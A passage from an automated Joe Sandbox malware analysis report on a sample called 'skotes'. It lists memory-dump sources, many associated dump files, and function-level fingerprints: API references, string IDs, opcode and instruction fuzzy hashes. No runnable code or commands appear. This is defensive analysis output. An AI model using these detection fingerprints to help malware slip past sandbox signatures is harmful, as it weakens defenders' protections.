                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ___free_lconv_mon
                                                                                                                                                                                                                                                  • String ID: 8"M$`'M
                                                                                                                                                                                                                                                  • API String ID: 3903695350-1506308239
                                                                                                                                                                                                                                                  • Opcode ID: 96a62c121d3872d5c8fadf9a7b44bd5afa29595452b39557429d2471f62e5f89
                                                                                                                                                                                                                                                  • Instruction ID: b8dcbab755dbcc059bef28d85c36f09d39f7b03d99999b5d540f40501f1f4224
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 96a62c121d3872d5c8fadf9a7b44bd5afa29595452b39557429d2471f62e5f89
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5318F31500201DFDB20AABAD945B5B73E6EF26316F10482FF485D7691DF78AC94CB19
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 004AF232
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 004AF298
                                                                                                                                                                                                                                                    • Part of subcall function 004AB04B: RtlAllocateHeap.NTDLL(00000000,A02F68A0,?,?,0048D3FC,A02F68A0,?,00487A8B,?,?,?,?,?,?,00477465,?), ref: 004AB07E
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocateHeap__alloca_probe_16__freea
                                                                                                                                                                                                                                                  • String ID: ZJ,mJ
                                                                                                                                                                                                                                                  • API String ID: 809856575-3561173285
                                                                                                                                                                                                                                                  • Opcode ID: 9698f50a104b2e795fdcf30012090760ecc874fb21bf775e90c926227e17e0b2
                                                                                                                                                                                                                                                  • Instruction ID: 56449e4a5511f465689790f276322bce54631432c31c79364bf628e48d03ca5d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9698f50a104b2e795fdcf30012090760ecc874fb21bf775e90c926227e17e0b2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7131397290020AABDB219FA5CC41EEF7B64EF56310F04416AFD14A7241DB39CC55C7A8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 004A1764
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004A17AF
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID: pContext
                                                                                                                                                                                                                                                  • API String ID: 3390424672-2046700901
                                                                                                                                                                                                                                                  • Opcode ID: 3450b289f8445b852fc0e2759674514524c3e64c7dc75c53e560961f0112120e
                                                                                                                                                                                                                                                  • Instruction ID: 5e8f07d8eac75b5a4c1ba60c682f1ccadf8c57549b57a346f5fe56dc9cfe17f8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3450b289f8445b852fc0e2759674514524c3e64c7dc75c53e560961f0112120e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B711063EA002109BCB15FF68C485A6D7765AFA6364F14406BE81297362DB3CED01CBD9
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 00490CD7
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::ResourceManager.LIBCONCRT ref: 00490D2A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Resource$AcquireConcurrency::details::Concurrency::details::_Lock::_ManagerManager::Reentrant
                                                                                                                                                                                                                                                  • String ID: p[M
                                                                                                                                                                                                                                                  • API String ID: 3303180142-4203874544
                                                                                                                                                                                                                                                  • Opcode ID: c4cc3f29807f188f9cb619b9b205259b93f7cd7a43f8600f39d3e8a69746791a
                                                                                                                                                                                                                                                  • Instruction ID: 79a49b38950a236e5d57af80821ca1be89d4e2e232c87924b3c9e19772443a8d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c4cc3f29807f188f9cb619b9b205259b93f7cd7a43f8600f39d3e8a69746791a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13019A70E066059EDF10ABFA656136D6FE0AF08308F60457FE445EB282CE3C9E41976E
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0049B94E
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0049B961
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
